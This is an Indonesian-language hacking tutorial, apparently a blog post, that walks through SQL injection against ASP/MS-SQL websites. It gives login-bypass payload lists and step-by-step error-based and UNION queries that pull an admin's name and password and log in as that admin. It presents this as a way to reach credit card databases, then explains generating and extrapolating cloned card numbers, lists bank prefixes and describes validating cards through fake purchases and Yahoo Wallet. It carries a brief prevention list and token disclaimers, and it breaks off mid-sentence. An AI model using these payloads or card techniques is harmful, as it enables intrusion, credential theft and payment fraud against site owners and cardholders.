pinter semua , kita cari yg gombol aja deh untuk tes kalau ga lo bisa buat sendiri scr i pt dan tes karena gw udah coba buat sendiri dan berhasil tanpa melakukan paket filter pada db nya. Untuk test apakah suatu page mempunyai vulnerable , begini caranya :</span><br /><span style="font-size:100%;">Kalian pernah melihat pada halaman-halaman ASP,JSP,PHP dan CGI yang didalam addressnya :</span><br /><span style="font-size:100%;">http://victim/index.asp?id=10</span><br /><span style="font-size:100%;">Selain kita test dengan login page diatas tadi, kita test dalam melakukan sedikit tambahan</span><br /><span style="font-size:100%;">pada addressnya seperti memasukan : test'1=1--</span><br /><span style="font-size:100%;">menjadi http://victim/index.asp?id=test'1=1--</span><br /><span style="font-size:100%;">Kita juga bisa juga melakukan xss dengan sql injection ini , coba download source HTML dari page target lalu kita tamhankan hidden field pada source tersebut sebagai contoh :</span><br /><span style="font-size:100%;">action="http://victim/admin/login.asp" method="post"></span><br /><br /><br /><span style="font-size:100%;">Apabila beruntung kita apabila membuka page tersebut tidak perlu memasukan password dan username. Ingat scr i pt ini ditamhakna pd scr i pt yg sudah kalian download dr target .</span><br /><span style="font-size:100%;">Variable ' or 1=1--</span><br /><span style="font-size:100%;">Mungkin pada bertanya-tanya kenapa mengunakan variable 'or 1=1-- dan sangat penting.Lihat contoh:</span><br /><span style="font-size:100%;">Pada sebuah web tertulis http://victim/index.asp?category=laptop</span><br /><span style="font-size:100%;">Dalam url tesebut category adalah variable name dan komputer adalah masukan untuk variable name tsb .</span><br /><span style="font-size:100%;">Kalau ditulis dalam scr i pt ASP maka akan menjadi :</span><br /><span style="font-size:100%;">v_cat = request("category")</span><br /><span style="font-size:100%;">sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"</span><br /><span style="font-size:100%;">set rs=conn.execute(sqlstr)</span><br /><span style="font-size:100%;">Data yang kita masukan seperti komputer akan masuk ke dalam v_cat variable dan pd sql statment menjadi</span><br /><span style="font-size:100%;">SELECT * FROM product WHERE PCategory='laptop'</span><br /><span style="font-size:100%;">Lalu apa hub dengan 'or 1=1---</span><br /><span style="font-size:100%;">coba kalau kita ganti http://victim/index.asp?category=laptop menjadi</span><br /><span style="font-size:100%;">http://victim/index.asp?category=laptop'or 1=1--</span><br /><span style="font-size:100%;">Kita lihat varible v_cat sekarang menjadi laptop'or 1=1-- lalu dalam SQL query nya menjadi</span><br /><span style="font-size:100%;">SELECT * FROM product WHERE PCategory='laptop' or 1=1--'</span><br /><span style="font-size:100%;">Artinya v_cat mendapatkan masukan berupa variable laptop atau var 1=1(kosong) yang menyebabkan Sql Server menjadi bingung dan akan mengeksekusi Select * pada table tsb yang mengakibatkan kita bisa masuk kedalam db teserbut dan db tsb tdk berfungsi :d. Lalu tanda -- merupakan mark dari sql untuk ignore semua perintah. Bisa dibayangkan kalau terjadi pada login page Kita bisa masuk kedalam login page tanpa password dan user name :d.</span><br /><span style="font-size:100%;">Kemungkinan-kemungkinan variable lainya :</span><br /><span style="font-size:100%;">or 1=1--</span><br /><span style="font-size:100%;">" or 1=1--</span><br /><span style="font-size:100%;">or 1=1--</span><br /><span style="font-size:100%;">' or 'a'='a</span><br /><span style="font-size:100%;">" or "a"="a</span><br /><span style="font-size:100%;">') or ('a'='a</span><br /><span style="font-size:100%;">' or 0=0 --</span><br /><span style="font-size:100%;">" or 0=0 --</span><br /><span style="font-size:100%;">or 0=0 --</span><br /><span style="font-size:100%;">' or 0=0 #</span><br /><span style="font-size:100%;">" or 0=0 #</span><br /><span style="font-size:100%;">or 0=0 #</span><br /><span style="font-size:100%;">' or 'x'='x</span><br /><span style="font-size:100%;">" or "x"="x</span><br /><span style="font-size:100%;">') or ('x'='x</span><br /><span style="font-size:100%;">' or 1=1--</span><br /><span style="font-size:100%;">" or 1=1--</span><br /><span style="font-size:100%;">or 1=1--</span><br /><span style="font-size:100%;">' or a=a--</span><br /><span style="font-size:100%;">" or "a"="a</span><br /><span style="font-size:100%;">') or ('a'='a</span><br /><span style="font-size:100%;">") or ("a"="a</span><br /><span style="font-size:100%;">hi" or "a"="a</span><br /><span style="font-size:100%;">hi" or 1=1 --</span><br /><span style="font-size:100%;">hi' or 1=1 --</span><br /><span style="font-size:100%;">hi' or 'a'='a</span><br /><span style="font-size:100%;">hi') or ('a'='a</span><br /><span style="font-size:100%;">hi") or ("a"="a</span><br /><br /><span style="font-size:100%;">Selain masuk kedalam page tersebut kita juga bisa memanfaatkannya untuk remote execution dengan sql Injection. Ingat ini hanya sebagai latihan pembelajaran, jangan disalahgunakan, saya tidak ingin mendapat dosa kolektif hanya karena gara-gara Anda tiba-tiba tergoda oleh setan dan menjadi orang yang jahat. Ingat menjadi jahat itu perbuatan dosa! Neraka akan menunggu Anda! :)</span><br /><span style="font-size:100%;">Sebenarnya SQL Injection ini merupakan sebuah metode tersendiri dalam dunia hacking. Hanya saja SQL Injection dapat digunakan untuk aktivitas carding. Persoalan apa dan bagaimana SQL Injection tidak akan saya singgung lagi, karena sudah dibahas di bagian paling awal dalam artikel ini. Boleh dibilang, saya hanya mengulas kembali apa yang sudah saya jelaskan dibagian awal tadi.</span><br /><span style="font-size:100%;">Melalui SQL Injection, maka seseorang bisa memasuki sebuah sistem. Entah bagaimanapun caranya. Cara yang paling sederhana adalah dengan menggunakan password dan account-nya: 'or"='</span><br /><span style="font-size:100%;">Bisa juga accountnya: admin, lalu passwordnya: 'or"='</span><br /><span style="font-size:100%;">Dengan cara tersebut, maka seseorang bisa memasuki sebuah sistem, seolah-olah dia adalah admin situs tersebut. Tentu saja admin gadungan tersebut bisa mengobok-obok sebuah sistem. Di dalamnya, admin tersebut bisa mendownload file database yang tentu saja mengandung nomor kartu kredit di dalamnya.</span><br /><span style="font-size:100%;">Selain itu, juga bisa melakukan aktivitas instant carding, yaitu dengan melihat file order.log ataupun order.txt.</span><br /><span style="font-size:100%;">Maaf, saya tidak menjelaskan teknik SQL Injection dengan mengakses tabel per tabel. Saya hanya mau menunjukkan konsepnya saja.</span><br /><br /><span style="font-size:100%;">Berikut ini ada beberapa kemungkinan lain password yang bisa dicoba seperti:</span><br /><span style="font-size:100%;">'or'a'='a</span><br /><span style="font-size:100%;">'or1=1-</span><br /><span style="font-size:100%;">"or1=1--</span><br /><span style="font-size:100%;">or1=1--</span><br /><span style="font-size:100%;">'or'a'='a</span><br /><span style="font-size:100%;">"or"a"="a</span><br /><span style="font-size:100%;">')or('a'='a</span><br /><br /><span style="font-size:100%;">Saya tebak, anda pasti sudah sering mendengar istilah "SQL Injection", bukan ?</span><br /><span style="font-size:100%;">Anda tahu betapa berbahaya bug yang satu ini ?</span><br /><span style="font-size:100%;">Berikut akan kita sajikan hal lain mengenai step by step SQL Injection ini.</span><br /><span style="font-size:100%;">Catatan : kita akan membatasi bahasan pada SQL Injection di MS-SQL Server.</span><br /><br /><span style="font-size:100%;">Kita akan mengambil contoh di site http://www.situs-target.com/</span><br /><span style="font-size:100%;">Misalnya ada dua kelemahan di website ini, yaitu:</span><br /><span style="font-size:100%;">1. Tabel News</span><br /><span style="font-size:100%;">2. Tabel Admin</span><br /><br /><span style="font-size:100%;">Langkah pertama, kita tentukan lubang mana yang bisa di-inject</span><br /><span style="font-size:100%;">dengan jalan berjalan-jalan (enumeration) dulu di site tsb.</span><br /><span style="font-size:100%;">Kita akan menemukan 2 model cara input parameter, yaitu dengan</span><br /><span style="font-size:100%;">cara memasukkan lewat input box dan memasukkannya lewat</span><br /><span style="font-size:100%;">alamat URL.</span><br /><br /><span style="font-size:100%;">Kita ambil yang termudah dulu, dengan cara input box.</span><br /><span style="font-size:100%;">Kemudian kita cari kotak login yang untuk admin.</span><br /><span style="font-size:100%;">Ketemu di www.situs-target.com/sipm/admin/admin.asp</span><br /><span style="font-size:100%;">Langkah pertama untuk menentukan nama tabel dan fieldnya,</span><br /><span style="font-size:100%;">kita inject kotak NIP dengan perintah (password terserah, cabang</span><br /><span style="font-size:100%;">biarkan aja):</span><br /><span style="font-size:100%;">' having 1=1--</span><br /><span style="font-size:100%;">jangan lupa untuk menuliskan tanda kutip tunggal dan tanda</span><br /><span style="font-size:100%;">minus dobel (penting).</span><br /><span style="font-size:100%;">Kemudian akan keluar pesan error:</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Column</span><br /><span style="font-size:100%;">'T_ADMIN.NOMOR' is invalid in the select list because</span><br /><span style="font-size:100%;">it is not contained in an aggregate function and</span><br /><span style="font-size:100%;">there is no GROUP BY clause.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Keluarlah nama field pertama kita !!!</span><br /><span style="font-size:100%;">Catat nama tabel : T_ADMIN</span><br /><span style="font-size:100%;">Catat nama field : NOMOR</span><br /><br /><span style="font-size:100%;">Kemudian kita akan mencari nama field-field berikutnya,</span><br /><span style="font-size:100%;">beserta nama tabel yang mungkin berbeda-beda.</span><br /><span style="font-size:100%;">Kita inject di kotak NIP (password terserah):</span><br /><span style="font-size:100%;">' group by T_ADMIN.NOMOR having 1=1--</span><br /><span style="font-size:100%;">Akan keluar pesan error:</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Column</span><br /><span style="font-size:100%;">'T_ADMIN.NIP' is invalid in the select list because</span><br /><span style="font-size:100%;">it is not contained in either an aggregate</span><br /><span style="font-size:100%;">function or the GROUP BY clause.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Artinya itulah nama tabel dan field kedua kita.</span><br /><span style="font-size:100%;">Catat : T_ADMIN.NIP</span><br /><br /><span style="font-size:100%;">Kemudian kita cari field ke tiga :</span><br /><span style="font-size:100%;">' group by T_ADMIN.NOMOR,T_ADMIN.NIP having 1=1--</span><br /><span style="font-size:100%;">Akan keluar pesan error:</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Column</span><br /><span style="font-size:100%;">'T_ADMIN.PASSWORD' is invalid in the select list because</span><br /><span style="font-size:100%;">it is not contained in either an aggregate</span><br /><span style="font-size:100%;">function or the GROUP BY clause.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Catat field ke tiga : T_ADMIN.PASSWORD</span><br /><br /><span style="font-size:100%;">Lakukan langkah di atas sampai kita menemukan field terakhir.</span><br /><span style="font-size:100%;">Berikut adalah pesan error yang terjadi, jika kita mengecek</span><br /><span style="font-size:100%;">field terakhir dengan meng-inject:</span><br /><span style="font-size:100%;">' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,</span><br /><span style="font-size:100%;">T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL</span><br /><span style="font-size:100%;">having 1=1--</span><br /><span style="font-size:100%;">(catatan : kalimat harus 1 baris, tidak dipotong)</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">- NIP atau Password atau Unit Anda salah !! -</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Sukses !!! Kita berhasil menemukan field terakhir.</span><br /><span style="font-size:100%;">Daftar kolom (field):</span><br /><span style="font-size:100%;">T_ADMIN.NOMOR</span><br /><span style="font-size:100%;">T_ADMIN.NIP</span><br /><span style="font-size:100%;">T_ADMIN.PASSWORD</span><br /><span style="font-size:100%;">T_ADMIN.NAMA</span><br /><span style="font-size:100%;">T_ADMIN.KD_RANTING</span><br /><span style="font-size:100%;">T_ADMIN.ADDRESS</span><br /><span style="font-size:100%;">T_ADMIN.EMAIL</span><br /><span style="font-size:100%;">Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),</span><br /><span style="font-size:100%;">ini akan mempermudah proses kita selanjutnya.</span><br /><br /><span style="font-size:100%;">Langkah berikutnya, kita menentukan jenis struktur field-</span><br /><span style="font-size:100%;">field tersebut di atas.</span><br /><br /><span style="font-size:100%;">Kita inject di kotak NIP (pass terserah) :</span><br /><span style="font-size:100%;">' union select sum(NOMOR) from T_ADMIN--</span><br /><span style="font-size:100%;">Arti dari query tersebut adalah : kita coba menerapkan</span><br /><span style="font-size:100%;">klausa sum sebelum menentukan apakah jumlah kolom-kolom</span><br /><span style="font-size:100%;">di dua rowsets adalah sejenis.</span><br /><span style="font-size:100%;">Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)</span><br /><span style="font-size:100%;">yang berlaku untuk type kolom numerik, jadi untuk type kolom</span><br /><span style="font-size:100%;">yang bukan numerik, akan keluar error yang bisa memberitahu</span><br /><span style="font-size:100%;">kita jenis kolom yang dimaksud.</span><br /><span style="font-size:100%;">Pesan error :</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]All queries</span><br /><span style="font-size:100%;">in an SQL statement containing a UNION operator must have</span><br /><span style="font-size:100%;">an equal number of expressions in their target lists.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">artinya kolom NOMOR berjenis numerik.</span><br /><br /><span style="font-size:100%;">Berikutnya kita inject :</span><br /><span style="font-size:100%;">' union select sum(NIP) from T_ADMIN--</span><br /><span style="font-size:100%;">Akan keluar pesan error :</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]The sum</span><br /><span style="font-size:100%;">or average aggregate operation cannot take a char data</span><br /><span style="font-size:100%;">type as an argument.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Artinya kolom NIP bertype char.</span><br /><br /><span style="font-size:100%;">Kita harus mengulang perintah di atas untuk kolom yang</span><br /><span style="font-size:100%;">berikutnya dengan jalan mengganti nama_kolom di :</span><br /><span style="font-size:100%;">' union select sum(nama_kolom) from T_ADMIN--</span><br /><span style="font-size:100%;">dengan kolom yang berikutnya.</span><br /><span style="font-size:100%;">Kita peroleh 7 type kolom:</span><br /><span style="font-size:100%;">T_ADMIN.NOMOR => numeric</span><br /><span style="font-size:100%;">T_ADMIN.NIP => char</span><br /><span style="font-size:100%;">T_ADMIN.PASSWORD => nvarchar</span><br /><span style="font-size:100%;">T_ADMIN.NAMA => char</span><br /><span style="font-size:100%;">T_ADMIN.KD_RANTING => char</span><br /><span style="font-size:100%;">T_ADMIN.ADDRESS => nvarchar</span><br /><span style="font-size:100%;">T_ADMIN.EMAIL => char</span><br /><br /><span style="font-size:100%;">Langkah berikutnya, kita akan mencari isi kolom password,</span><br /><span style="font-size:100%;">untuk user admin, dengan meng-inject :</span><br /><span style="font-size:100%;">' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--</span><br /><span style="font-size:100%;">artinya kita memilih minimum nama user yang lebih besar dari 'a'</span><br /><span style="font-size:100%;">dan mencoba meng-konvert-nya ke tipe integer.</span><br /><span style="font-size:100%;">Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih</span><br /><span style="font-size:100%;">kolom NAMA, dan mengabaikan 6 kolom yang lain.</span><br /><span style="font-size:100%;">Akan keluar pesan error :</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax</span><br /><span style="font-size:100%;">error converting the varchar value 'bill ' to</span><br /><span style="font-size:100%;">a column of data type int.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">--------------------</span><br /><span style="font-size:100%;">Anda lihat :</span><br /><span style="font-size:100%;">varchar value 'bill '</span><br /><span style="font-size:100%;">'bill' itu adalah nama user di record yang terakhir dimasukkan,</span><br /><span style="font-size:100%;">atau isi kolom NAMA di record yang terakhir dimasukkan.</span><br /><br /><span style="font-size:100%;">Selanjutnya kita inject :</span><br /><span style="font-size:100%;">' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where</span><br /><span style="font-size:100%;">NAMA = 'bill'--</span><br /><span style="font-size:100%;">catatan : harus sebaris (tidak dipotong).</span><br /><span style="font-size:100%;">Akan keluar error :</span><br /><span style="font-size:100%;">---------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax</span><br /><span style="font-size:100%;">error converting the nvarchar value 'm@mpusk@u' to a</span><br /><span style="font-size:100%;">column of data type int.</span><br /><span style="font-size:100%;">/sipm/admin/dologin.asp, line 7</span><br /><span style="font-size:100%;">---------------------</span><br /><span style="font-size:100%;">Artinya kita berhasil !!!</span><br /><span style="font-size:100%;">Kita dapatkan</span><br /><span style="font-size:100%;">[ ] NAMA = bill</span><br /><span style="font-size:100%;">[ ] PASSWORD = m@mpusk@u</span><br /><br /><span style="font-size:100%;">Silahkan login ke :</span><br /><span style="font-size:100%;">www.situs-target.com/sipm/admin/admin.asp</span><br /><span style="font-size:100%;">dengan account di atas, sedang nama cabang, silahkan anda</span><br /><span style="font-size:100%;">isi sendiri dengan cara coba-coba</span><br /><br /><span style="font-size:100%;">Atau kita pakai jalan pintas saja....</span><br /><br /><span style="font-size:100%;">Kita inject-kan :</span><br /><span style="font-size:100%;">' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN</span><br /><span style="font-size:100%;">where NAMA ='bill'--</span><br /><span style="font-size:100%;">catatan : harus satu baris.</span><br /><span style="font-size:100%;">Duarrrrrr..........</span><br /><span style="font-size:100%;">Glodhak.............</span><br /><span style="font-size:100%;">Langsung masuk ke menu admin.</span><br /><span style="font-size:100%;">Ingat : jangan buat kerusakan ! beritahu sang admin, bahwa websitenya vulnerable !!!</span><br /><br /><span style="font-size:100%;">Lubang ke dua adalah pada bagian berita.</span><br /><span style="font-size:100%;">Pada dasarnya berita di situ adalah isi dari tabel yang</span><br /><span style="font-size:100%;">lain lagi. Jadi tetep bisa kita inject !!!</span><br /><span style="font-size:100%;">Bedanya, kita harus memasukkan parameter di alamat URL-nya.</span><br /><span style="font-size:100%;">Contoh :</span><br /><span style="font-size:100%;">www.situs-target.com/dari_Media.asp?id=2119&idm=40&idSM=2</span><br /><span style="font-size:100%;">ada parameter id dan idSM.</span><br /><span style="font-size:100%;">Setelah kita coba inject, ternyata yang berpengaruh adalah</span><br /><span style="font-size:100%;">parameter id aja (CMIIW).</span><br /><br /><span style="font-size:100%;">Kita inject-kan :</span><br /><span style="font-size:100%;">www.situs-target.com/dari_Media.asp?id=2119' having 1=1--</span><br /><span style="font-size:100%;">akan keluar pesan error :</span><br /><span style="font-size:100%;">---------------------------</span><br /><span style="font-size:100%;">Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)</span><br /><span style="font-size:100%;">[Microsoft][ODBC SQL Server Driver][SQL Server]Column</span><br /><span style="font-size:100%;">'tb_news.NewsId' is invalid in the select list because</span><br /><span style="font-size:100%;">it is not contained in an aggregate function and</span><br /><span style="font-size:100%;">there is no GROUP BY clause.</span><br /><span style="font-size:100%;">/dari_Media.asp, line 58</span><br /><span style="font-size:100%;">---------------------------</span><br /><span style="font-size:100%;">artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita</span><br /><span style="font-size:100%;">yang pertama.</span><br /><br /><span style="font-size:100%;">Ulangi langkah-langkah kita di atas sampai didapatkan :</span><br /><span style="font-size:100%;">tb_news.NewsId => numeric</span><br /><span style="font-size:100%;">tb_news.NewsCatId => numeric</span><br /><span style="font-size:100%;">tb_news.EntryDate => datetime</span><br /><span style="font-size:100%;">tb_news.Title => nvarchar</span><br /><span style="font-size:100%;">tb_news.Content =></span><br /><span style="font-size:100%;">tb_news.FotoLink =></span><br /><span style="font-size:100%;">tb_news.FotoType => bit data</span><br /><span style="font-size:100%;">tb_news.review =></span><br /><span style="font-size:100%;">tb_news.sumber => char</span><br /><span style="font-size:100%;">tb_news.dateagenda => datetime</span><br /><br /><span style="font-size:100%;">Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan pengetahuan anda. Anda bisa men-insert berita yang bisa anda tentukan sendiri isinya.</span><br /><span style="font-size:100%;">Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.</span><br /><br /><span style="font-size:100%;">******************************************************</span><br /><span style="font-size:100%;">KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!</span><br /><span style="font-size:100%;">******************************************************</span><br /><span style="font-size:100%;">Cara pencegahan yang umum digunakan :</span><br /><span style="font-size:100%;">1. Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.</span><br /><span style="font-size:100%;">2. Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).</span><br /><span style="font-size:100%;">3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.</span><br /><span style="font-size:100%;">4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.</span><br /><span style="font-size:100%;">5. Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.</span><br /><br /><span style="font-size:100%;">Yah itulah mungkin yang dapat saya ceritakan.....</span><br /><span style="font-size:100%;">Hal itu adalah gambaran, betapa tidak amannya dunia internet...</span><br /><span style="font-size:100%;">Kalau mau lebih aman, copot kabel jaringan anda, copot disk drive anda, copot harddisk anda, jual kompie anda !!!</span><br /><br /><span style="font-size:100%;">TEKNIK VALIDASI KARTU KREDIT</span><br /><br /><span style="font-size:100%;">Pembahasan kali ini sudah cukup jauh. Berbagai teknik untuk mengetahui/mencari/melihat dan mengamankan dan mengantisipasi kartu kredit dari jangkauan pencuri sudah Anda ketahui. Dengan mencoba menyelami jalan pikiran seorang carder, maka seorang penegak hukum (cyber police) maupun para webmaster bisa lebih berhati-hati dalam menyingkap setiap kasus per kasus, sehingga dapat dilakukan tindakan pencegahan.</span><br /><span style="font-size:100%;">Berikutnya adalah beberapa point penting atau cara yang biasa dilakukan oleh para carder untuk melakukan carding.</span><br /><span style="font-size:100%;">Sebenarnya ada banyak cara untuk memvalidasi nomor kartu kredit, salah satunya adalah dengan algoritma Luhn yang sudah saya jelaskan di bagian awal. Termasuk juga pemakaian program tertentu.</span><br /><span style="font-size:100%;">Metode validitas berikut ini lebih efektif karena bertujuan untuk mengetes apakah nomor sebuah kartu kredit bisa diterima atau tidak. Caranya sangat gampang dilakukan, terutama melalui toko-toko online terkenal. Yang perlu dilakukan hanyalah berpura-pura belanja. Apabila kartu tersebut diterima, sudah tentu kartu tersebut valid.</span><br /><span style="font-size:100%;">Apalagi melakukan validasi tidak harus dengan membeli sebuah produk, cukup dengan melakukan registry saja, tentu akan lebih enak.</span><br /><span style="font-size:100%;">Ketidakvalidan sebuah nomor kartu kredit bisa saja terjadi, karena kesalahan user itu sendiri. Misalnya, kartu tersebut adalah Visa, tapi yang dipilih adalah MasterCard. Contoh yang paling sederhana untuk melakukan validasi adalah dengan memasukkan digit awal sebuah kartu yang tepat. Misalnya, kartu Visa digit pertamanya adalah 4 (empat), MasterCard digit awalnya adalah 5 (lima). Dan hal tersebut tidak dapat dibalik, apabila dibalik sudah pasti akan terjadi ketidakvalidan.</span><br /><span style="font-size:100%;">Valid tidaknya sebuah nomor kartu kredit bukanlah dilakukan menggunakan CC Generator. Karena program tersebut hanyalah untuk mendapatkan nomor kloning dari nomor utama.</span><br /><br /><span style="font-size:100%;">GENERATE VS EXTRAPOLATE</span><br /><br /><span style="font-size:100%;">Sebelum membicarakan mengenai teknik validasi tersebut, saya akan sedikit mengulas perbedaan antara Generate dan Extrapolate. Sebab masih banyak yang bingung membedakan antara kedua hal tersebut. Walaupun keduanya memiliki maksud dan tujuan yang sama, menghasilkan kloning nomor kartu kredit.</span><br /><span style="font-size:100%;">Supaya lebih gampang dipahami, saya sertakan saja sebuah ilustrasi.</span><br /><span style="font-size:100%;">Katakanlah sebuah program seperti CC Generator menyebutkan bahwa sebuah nomor valid. Misalnya, Anda telah menguji sebuah nomor, anggaplah kartu visa dengan nomor:</span><br /><span style="font-size:100%;">4367123401010690.</span><br /><br /><span style="font-size:100%;">Kita buat hasil extrapolate-nya ada lima:</span><br /><span style="font-size:100%;">4367123401010690</span><br /><span style="font-size:100%;">4367123401010962</span><br /><span style="font-size:100%;">4367123401011123</span><br /><span style="font-size:100%;">4367123401018765</span><br /><span style="font-size:100%;">4367123401017894</span><br /><br /><span style="font-size:100%;">Sedangkan hasil generate-nya adalah:</span><br /><span style="font-size:100%;">4367321078904662</span><br /><span style="font-size:100%;">4367574589029832</span><br /><span style="font-size:100%;">4367067965484344</span><br /><span style="font-size:100%;">4367000846339856</span><br /><span style="font-size:100%;">4367356736750212</span><br /><br /><span style="font-size:100%;">Dari gambaran tersebut terlihat jelas, proses extrapolate hanya melakukan proses logaritma random untuk 4 digit terakhir saja. Sebaliknya, proses generate tidak mengubah hanya 4 digit pertama saja.</span><br /><span style="font-size:100%;">Secara struktur terlihat bahwa proses generate memberikan variabel digit yang lebih besar ketimbang extrapolate. Walau demikian, hasil dari extrapolate lebih tertuju pada sebuah nomor kartu kredit saja sehingga memiliki kemungkinan validitas yang lebih tinggi.</span><br /><span style="font-size:100%;">Dengan dua teknik tersebut, maka bisa dilakukan kombinasi. Untuk memperbanyak sebuah nomor kartu kredit diperlukan proses generating. Dan extrapolate untuk mengkloning nomor yang dimiliki. Tentu saja dengan memperhatikan prefix 4 digit pertama. Supaya lebih enakan, gambaran strukturnya adalah sebagai berikut:</span><br /><br /><span style="font-size:100%;">Nomor asli Hasil Generating Hasil Extrapolating</span><br /><span style="font-size:100%;">4367 1234 0101 0690 4367 3210 7890 4662 4367 3210 7890 2857</span><br /><span style="font-size:100%;">4367 3210 7890 3523</span><br /><span style="font-size:100%;">4367 3210 7890 0022</span><br /><span style="font-size:100%;">4367 5745 8902 9832 4367 5745 8902 3525</span><br /><span style="font-size:100%;">4367 5745 8902 0133</span><br /><span style="font-size:100%;">4367 5745 8902 3505</span><br /><span style="font-size:100%;">4367 3567 3675 0212 4367 3567 3675 5730</span><br /><span style="font-size:100%;">4367 3567 3675 7835</span><br /><span style="font-size:100%;">4367 3567 3675 1211</span><br /><br /><span style="font-size:100%;">* Semua nomor yang saya ketikkan di atas dan juga semua angka-angka dalam artikel ini adalah acak (asal ketik), sekedar untuk contoh saja.</span><br /><br /><span style="font-size:100%;">Dari tabel tersebut, bisa diketahui bahwa hasil kombinasi antara proses generate dan extrapolate sangat berbahaya sekali dalam menghasilkan nomor kartu kredit yang random.</span><br /><span style="font-size:100%;">Sebagai tambahan, berikut adalah daftar beberapa prefix bank. Ini saya tampilkan beberapa saja sebagai contoh. Untuk prefix yang umum bisa Anda lihat pada penjelasan di bagian awal.</span><br /><br /><span style="font-size:100%;">VISA</span><br /><span style="font-size:100%;">Prefix Nama Bank</span><br /><span style="font-size:100%;">4019 Bank of America</span><br /><span style="font-size:100%;">4032 Household Bank</span><br /><span style="font-size:100%;">4071 Colonial National Bank</span><br /><span style="font-size:100%;">4113 Valley National Bank</span><br /><span style="font-size:100%;">4114 Chemical Bank</span><br /><span style="font-size:100%;">4301 Monogram Bank</span><br /><span style="font-size:100%;">4387 Bank One</span><br /><span style="font-size:100%;">4418 Bank of Omaha</span><br /><span style="font-size:100%;">4421 Indiana National Bank</span><br /><span style="font-size:100%;">4811 Bank of Hawaii</span><br /><span style="font-size:100%;">4833 U.S. Bank</span><br /><span style="font-size:100%;">4921 Hongkong/National Bank</span><br /><br /><span style="font-size:100%;">MasterCard</span><br /><span style="font-size:100%;">Prefix Nama Bank</span><br /><span style="font-size:100%;">5100 Southwestern States Bank</span><br /><span style="font-size:100%;">5130 Eurocard France</span><br /><span style="font-size:100%;">5190 Bank of Montreal</span><br /><span style="font-size:100%;">5191 Bank of Montreal</span><br /><span style="font-size:100%;">5201 Mellon Bank, N.A.</span><br /><span style="font-size:100%;">5217 Union Trust</span><br /><span style="font-size:100%;">5224 Midland Bank</span><br /><span style="font-size:100%;">5226 Eurocard Ab</span><br /><span style="font-size:100%;">5333 Ohio National Bank</span><br /><br /><br /><span style="font-size:100%;">VALIDASI DENGAN YAHOO WALLET</span><br /><br /><span style="font-size:100%;">Nomor-nomor yang dihasilkan dari proses generating maupun extrapolating, lebih membutuhkan uji kelayakan ketimbang hasil dari carding-in database dan instant hacking. Tapi, kalau Anda tetap mau mencoba, ya tidak ada yang melarang.</span><br /><span style="font-size:100%;">Di sini saya mencoba dengan memanfaatkan fasilitas Yahoo Wallet. Sebenarnya Anda juga bisa memanfaatkan situs ebay, dan banyak situs lainnya. Saya rasa cukup dengan menjelaskan Yahoo Wallet saja, sebab untuk penggunaan ebay dan lainnya hampir sama saja dengan Yahoo Wallet.</span><br /><span style="font-size:100%;">Untuk dapat menggunakan 